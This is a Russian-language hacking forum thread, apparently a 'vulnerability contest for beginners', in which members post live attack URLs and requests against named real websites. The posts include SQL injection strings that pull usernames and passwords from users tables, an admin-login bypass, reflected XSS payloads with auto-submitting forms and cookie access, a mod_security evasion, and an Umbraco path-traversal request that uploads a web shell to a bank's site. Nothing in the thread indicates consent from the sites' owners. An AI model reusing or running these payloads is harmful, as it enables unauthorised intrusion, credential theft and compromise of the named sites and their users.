Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. Jup1ter_

    Jup1ter_ New Member

    Joined:
    27 Nov 2015
    Messages:
    19
    Likes Received:
    4
    Reputations:
    6
    SQLi
    http://www.ataegitim.com.tr/yurtdisi_egitim.php?id=1+union+select+1,2,3,version(),5,6,7

    http://www.bursaymmo.org.tr/fotografgalerisi/haber_oku.php?haber_id=14+union+select+version(),2,3,4,5,6

    http://www.sistemkalip.com.tr/tr/haber_detay.php?recordID=1+union+select+1,2,version(),4,5,6
     
    #101 Jup1ter_, 27 Nov 2015
    Last edited: 27 Nov 2015
    1. ubepkr

      ubepkr Member

      Joined:
      17 Aug 2015
      Messages:
      96
      Likes Received:
      20
      Reputations:
      1
      Сайт: http://www.academyplazahotel.ie/
      Уязвимость: Reflected XSS
      Code:
      http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"--><scRipt>alert(1234567890)</scRipt>
      Сайт: http://www.cleanrooms-ireland.ie
      Уязвимость: Reflected XSS
      Code:
      http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"--></scRipt><scRipt>alert(1234567890)</scRipt>
      там же: (?redirect?)
      Code:
      http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com
      Сайт: http://forums.somethingawful.com
      Уязвимость: Reflected XSS
      Code:
      http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25<acx><ScRiPt%20>alert(1234567890)</ScRiPt>
      Сайт: http://www.zoommoola.com
      Уязвимость: Reflected XSS
      Code:
      http://www.zoommoola.com/?ref='"--><scRipt>alert(1234567890)</scRipt> 
      Сайт: http://www.usatestprep.com
      Уязвимость: Reflected XSS
      Code:
      http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%<acx><ScRiPt >alert(123456)</ScRiPt>
      Сайт: http://txbra.org
      Уязвимость: XSS
      Code:
        <form style="display:none" action="http://txbra.org/results13/index.asp?page=race" method="POST">
              <input name="submit" value="Go"/>
              <input name="cbo" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1234567890)&lt;/scRipt&gt;"/>
          </form>
          <script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>
       
      1. Jup1ter_

        Jup1ter_ New Member

        Joined:
        27 Nov 2015
        Messages:
        19
        Likes Received:
        4
        Reputations:
        6
        Конкурс уже не актуален?
        http://www.tontomarine.co.uk/boat.p...4,5,version(),7,8,9,0,11,12,13,14,15,16,17,18
         
        1. yarbabin

          yarbabin HACKIN YO KUT

          Joined:
          21 Nov 2007
          Messages:
          1,663
          Likes Received:
          916
          Reputations:
          363
          актуален, времени пока нет разгрести. позже всем добавлю
           
          _________________________
          1. Octavian

            Octavian Elder - Старейшина

            Joined:
            8 Jul 2015
            Messages:
            506
            Likes Received:
            101
            Reputations:
            25
            Remote Code Execution
            Сайт: ecb.md
            Эксплоит:
            Code:
            POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
            SOAPAction: "http://tempuri.org/SaveDLRScript"
            Content-Type: text/xml
            Host: ecb.md
            Content-Length: 710
            Connection: Keep-alive
            Accept-Encoding: gzip,deflate
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
            Accept: */*
            
            <?xml version="1.0" encoding="utf-8"?>
            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
                <soap:Body>
                    <SaveDLRScript xmlns="http://tempuri.org/">
                        <fileName>/..\\..\\..\\umbraco\\shell.aspx</fileName>
                        <oldName>string</oldName>
                        <fileContents>
            
            Код шелла .aspx,в burpsuite выбираем
            Convert selection->Html->Html encode key characters
            так прошел через фильтрацию
            
            </fileContents>
                        <ignoreDebugging>1</ignoreDebugging>
                    </SaveDLRScript>
                </soap:Body>
            </soap:Envelope>
            Заливается тут ecb.md/umbraco/shell.aspx
             
            Gorev, lisvan, grimnir and 2 others like this.
            1. chatanti

              chatanti Member

              Joined:
              13 Jul 2011
              Messages:
              30
              Likes Received:
              16
              Reputations:
              0
              зашел на ecb.md, стало страшно, ушел)
               
              1. Octavian

                Octavian Elder - Старейшина

                Joined:
                8 Jul 2015
                Messages:
                506
                Likes Received:
                101
                Reputations:
                25
                Месныи банк )
                 
                1. BabaDook

                  BabaDook Well-Known Member

                  Joined:
                  9 May 2015
                  Messages:
                  1,063
                  Likes Received:
                  1,559
                  Reputations:
                  40
                  Вы уже всё сделали

                  PHP:
                  http://www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(),5,6+--+-
                   
                  Filipp and AAI like this.
                  1. AAI

                    AAI Member

                    Joined:
                    27 Dec 2015
                    Messages:
                    16
                    Likes Received:
                    8
                    Reputations:
                    1
                    Сайт: www.normatech.it/login-admin.asp
                    Уязвимость: SQL injection

                    Code:
                    login: ' or '1'='1 pass: ' or '1'='1
                     
                    BabaDook likes this.
                    1. R3hab

                      R3hab Member

                      Joined:
                      17 May 2015
                      Messages:
                      116
                      Likes Received:
                      8
                      Reputations:
                      6
                      AAI,
                      SQL Инъекции1
                      SQL Инъекции2
                       
                      1. AAI

                        AAI Member

                        Joined:
                        27 Dec 2015
                        Messages:
                        16
                        Likes Received:
                        8
                        Reputations:
                        1
                        Парю проверять! Спасибо.
                         
                        1. nordwarrior

                          nordwarrior New Member

                          Joined:
                          12 Dec 2015
                          Messages:
                          13
                          Likes Received:
                          2
                          Reputations:
                          2
                          SQL-i, обход mod_security
                          Code:
                          http://thewallis.org/showinfo.php?id=-1+/*!50000UNION+select+null,concat_ws%280x3a,TABLE_NAME,%20COLUMN_NAME%29+/**/FROM+/**/INFORMATION_SCHEMA.COLUMNS/**/+LIMIT+0,800*/
                          
                           
                          Zen1T21 likes this.
                          1. lastbyte

                            lastbyte New Member

                            Joined:
                            11 Feb 2016
                            Messages:
                            2
                            Likes Received:
                            0
                            Reputations:
                            1
                            Сайт: https://api.lever.co
                            Уязвимость: отраженный xss
                            Эксплойт: https://api.lever.co/v0/postings/lever?mode=iframe&resize=javascript:window.location=alert('xss');//
                             
                            1. yarbabin

                              yarbabin HACKIN YO KUT

                              Joined:
                              21 Nov 2007
                              Messages:
                              1,663
                              Likes Received:
                              916
                              Reputations:
                              363
                              небольшие проблемы с хостингом и рейтингом, пока восстанавливаю
                               
                              _________________________
                              1. Octavian

                                Octavian Elder - Старейшина

                                Joined:
                                8 Jul 2015
                                Messages:
                                506
                                Likes Received:
                                101
                                Reputations:
                                25
                                Сайт: http://www.bri.gov.md/panel/login.php
                                Уязвимость: Отменяем редирект
                                Эксплойт:

                                Сайт: http://www.stroika.md/
                                Уязвимость: SQL injection
                                Эксплойт:
                                Code:
                                http://www.stroika.md/detail.php?id=1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
                                Сайт: http://www.calidus.ro/
                                Уязвимость: SQL injection
                                Эксплойт:
                                Code:
                                http://www.calidus.ro/en/news.php?id=-1+UNION+SELECT+1%2Cusername%2C3%2Cuser_password+FROM+users
                                Сайт: http://lukoil.md/ro/search_result
                                Уязвимость: SQL injection (Post SQL-inj в поиске)
                                Эксплойт:
                                Code:
                                -1' UNION SELECT 1,2,user(),4,5,6 -- 
                                Сайт: http://mobile.airmoldova.md/
                                Уязвимость: SQL injection
                                Эксплойт:
                                Code:
                                http://mobile.airmoldova.md/special-offers-ru/?item=-9179)+UNION+SELECT+1,2,3,4,5,user_login,7,8,9,10,11,12,13,user_password,15,16,17,18,19,20,21,22,23,24,25+FROM+users+--+
                                Сайт: http://www.infocom.md/
                                Уязвимость: SQL injection
                                Эксплойт:
                                Code:
                                http://www.infocom.md/evenimente.php?id=13+UNION+SELECT+1,2,user(),version()+--+
                                Сайт: http://investigatii.md/
                                Уязвимость: SQL injection
                                Эксплойт:
                                Code:
                                http://investigatii.md/eng/comments.php?id=258+union+select+1,2,version(),user(),5,6,7,8,9,database(),11,12,13,14
                                 
                                #115 Octavian, 19 Feb 2016
                                Last edited: 19 Feb 2016
                                1. BabaDook

                                  BabaDook Well-Known Member

                                  Joined:
                                  9 May 2015
                                  Messages:
                                  1,063
                                  Likes Received:
                                  1,559
                                  Reputations:
                                  40
                                  Невидимая ЭскуЭль инъекция
                                  PHP:
                                  http://parfume.in.ua/parfumes.php?Gabanna&designer=DG&designers=Dolce&sort=1+and+sleep(12)+--+-
                                  АштиМиЭль Всовывание
                                  PHP:
                                  http://shops.ixi.ua/goods.php?goods=<h2>hello<br>mir</
                                  И щё адна ЭскуЭль встафка аснована на времени
                                  PHP:
                                  http://www.bdsm.com.ua/shop/index.php?bdsm=cat&sort=1+and+sleep(123)&val=11_266 
                                  Так же гагичэски правда иль лош
                                  PHP:
                                  http://www.bdsm.com.ua/shop/index.php?bdsm=cat&sort=1+and+1=1&val=11_266
                                   
                                  #116 BabaDook, 6 Mar 2016
                                  Last edited: 6 Mar 2016
                                  1. blacKK

                                    blacKK New Member

                                    Joined:
                                    13 Mar 2016
                                    Messages:
                                    16
                                    Likes Received:
                                    1
                                    Reputations:
                                    0
                                     
                                    1. crlf

                                      crlf Green member

                                      Joined:
                                      18 Mar 2016
                                      Messages:
                                      683
                                      Likes Received:
                                      1,513
                                      Reputations:
                                      460
                                      Тема для Wordpress

                                      Avada #1 Selling Theme of All Time
                                      (190,000+ Satisfied Customers)
                                      inurl:"product_orderby" (Результатов: примерно 8 840 000 (0,63 сек.) )


                                      ./includes/woo-config.php

                                      PHP:
                                           if ( isset( $_SERVER['QUERY_STRING'] ) ) {
                                             
                                      parse_str$_SERVER['QUERY_STRING'], $params );
                                           }
                                           
                                      $order = ! empty( $params['product_order'] ) ? $params['product_order'] : 'desc';
                                           
                                      $order strtoupper$order );

                                           
                                      $args['orderby'] = "sum_of_comments_approved DESC, average_rating {$order}$wpdb->posts.post_date DESC";

                                      Получается Time-Based Blind SQL Injection:


                                      В тонкости не вдавался, похоже что спит так: количество сортируемых товаров * sleep(). Подверженные версии, скорее всего, <= 4, включая последнюю. Точно не проверял.
                                       
                                      1. crlf

                                        crlf Green member

                                        Joined:
                                        18 Mar 2016
                                        Messages:
                                        683
                                        Likes Received:
                                        1,513
                                        Reputations:
                                        460

                                        Magento Downloader - 1.x

                                        Reflected XSS



                                        HTML:
                                        <html>
                                           <body onload="document.forms.hidden.submit();">
                                             <form id="hidden" method="POST" action="http://host/downloader.php?action=checkdb">
                                               <input name="host" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
                                               <input name="username" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
                                               <input name="password" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
                                             </form>
                                           </body>
                                        </html>
                                        
                                        

                                        ./downloader.php:

                                        PHP:
                                          public function validateAction()
                                          {
                                        ...

                                          if (isset(
                                        $_GET['action']) && $_GET['action'] == 'checkdb') {
                                          
                                        $this->_session['host'] = $this->_helper->getPost('host');
                                          
                                        $this->_session['username'] = $this->_helper->getPost('username');
                                          
                                        $this->_session['database'] = $this->_helper->getPost('database');

                                        ...

                                          public function 
                                        getPost($key null$default null)
                                          {
                                          if (
                                        is_null($key)) {
                                          return 
                                        $_POST;
                                          }
                                          if (isset(
                                        $_POST[$key])) {
                                          return 
                                        $_POST[$key];
                                          }
                                          return 
                                        $default;
                                          }
                                        ...

                                          
                                        $this->_helper->printHtmlValidateBlock($this->_session);

                                        ...

                                          public function 
                                        printHtmlValidateBlock($session)
                                          {
                                          
                                        $host  = isset($session['host']) ? $session['host'] : 'localhost';
                                          
                                        $username = isset($session['username']) ? $session['username'] : '';
                                          
                                        $password = !empty($session['password']) ? '******' '';
                                          echo <<<HTML
                                          <div class="connection">
                                          <fieldset class="fieldset">
                                          <legend>Database Connection</legend>
                                          <div class="legend">Database Connection</div>
                                          <div class="input-box">
                                          <label for="host">Host </label><br />
                                          <input value="
                                        {$host}" type="text" name="host" id="host" class="input-text" />
                                          </div>
                                          <div class="input-box">
                                          <label for="username">User Name </label><br />
                                          <input value="
                                        {$username}" type="text" name="username" id="username" class="input-text" />
                                          </div>
                                          <div class="input-box">
                                          <label for="password">User Password </label><br />
                                          <input value="
                                        {$password}" type="password" name="password" id="password" class="input-text" />
                                          </div>
                                        HTML;
                                          echo 
                                        $this->printHtmlButtonSet(array('checkdb'=>'Check for InnoDB support'));
                                          echo <<<HTML
                                          </fieldset>
                                          </div>
                                        HTML;
                                          }

                                        FPD

                                        ./downloader.php:

                                        PHP:

                                          
                                        protected function _setConnection($host 'localhost'$username ''$password '')
                                          {
                                          try {
                                          
                                        $dsn 'mysql:host=' $host ';';
                                          
                                        $this->_connection = new PDO($dsn$username$password);
                                          } catch (
                                        PDOException $e) {
                                          
                                        $this->addError('Access denied for user ' $username '@' $host);
                                          }
                                          return 
                                        $this;
                                          }

                                         
                                        1. t0ma5

                                          t0ma5 Reservists Of Antichat

                                          Joined:
                                          10 Feb 2012
                                          Messages:
                                          829
                                          Likes Received:
                                          815
                                          Reputations:
                                          90
                                          называется найди уязвимость)?
                                          читайте правила оформления постов

                                          Сайт: http://pedigree.gamedogs.cz
                                          Уязвимость: SQL Injection
                                          Code:
                                          http://pedigree.gamedogs.cz/managePerson.php?personId=-966+union+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12+--+s
                                          
                                          10.0.23-MariaDB-0+deb8u1
                                           
                                          _________________________
                                          Take_IT likes this.
                                          Loading...
                                          Similar Threads - Конкурс уязвимостей новичков
                                          1. zase
                                            Replies:
                                            1
                                            Views:
                                            3,559
                                          2. Shadows_God
                                            Replies:
                                            14
                                            Views:
                                            8,105